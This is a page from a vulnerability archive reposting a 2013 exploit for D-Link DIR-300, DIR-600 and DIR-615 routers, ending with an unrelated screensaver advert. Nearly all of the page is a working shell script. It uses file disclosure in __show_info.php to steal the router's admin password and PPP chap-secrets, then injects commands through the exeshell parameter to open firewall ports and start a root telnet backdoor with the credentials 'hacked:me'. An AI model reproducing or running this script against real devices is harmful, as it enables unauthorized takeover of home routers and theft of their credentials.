Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30051
HistoryDec 09, 2013 - 12:00 a.m.

D-Link DIR-XXX remote root access exploit.

2013-12-0900:00:00
vulners.com
22

General info:

A lot have been already said about SOHO routers. Thus, without further ado another nail in the coffin.

knock knock

– cut
#!/bin/sh

if [ -z "$1" ]; then
echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)";
echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b";
echo "usage: $0 [router address] [telnet port]";
exit 0;
fi;

if [ -z "$2" ]; then
TPORT=3333;
else
TPORT=$2;
fi

UPORT=31337;

echo "Trying $1 …";

HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd&quot; | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]\):\([^:]\)$/\1\n \2/g"`;

if [ ! -z "$HTTPASSWD" ]; then
L=`echo $HTTPASSWD | cut -d' ' -f1`;
P=`echo $HTTPASSWD | cut -d' ' -f2`;

    echo &quot;found username: $L&quot;;
    echo &quot;found password: $P&quot;;


    curl -d &quot;ACTION_POST=LOGIN&amp;LOGIN_USER=$L&amp;LOGIN_PASSWD=$P&quot; -sS &quot;http://$1/login.php&quot; | grep -v &quot;fail&quot; 1&gt;/dev/null;

    if [ $? -eq 0 ]; then
            curl -sS &quot;http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1&quot; 1&gt;/dev/null;
            curl -sS &quot;http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&amp;set/runtime/syslog/sendmail=1&quot; 1&gt;/dev/null;
            curl -sS &quot;http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&amp;exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&amp;set/runtime/syslog/sendmail=1&quot; 1&gt;/dev/null;

            echo &quot;if you are lucky telnet is listening on $TPORT &#40;hacked:me&#41; ...&quot;
            curl -sS &quot;http://$1/logout.php&quot; 1&gt;/dev/null;
    fi

fi

CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets&quot; | grep -A1 "<center>" | sed -e "s/<center>//g"`;

if [ ! -z "$CHAP" ]; then
echo "found chap-secrets: $CHAP";
fi

echo "Bye bye.";

exit 0;

– cut

Credits:

echo $use_the_source_luke


FREE 3D MARINE AQUARIUM SCREENSAVER - Watch dolphins, sharks & orcas on your desktop!
Check it out at http://www.inbox.com/marineaquarium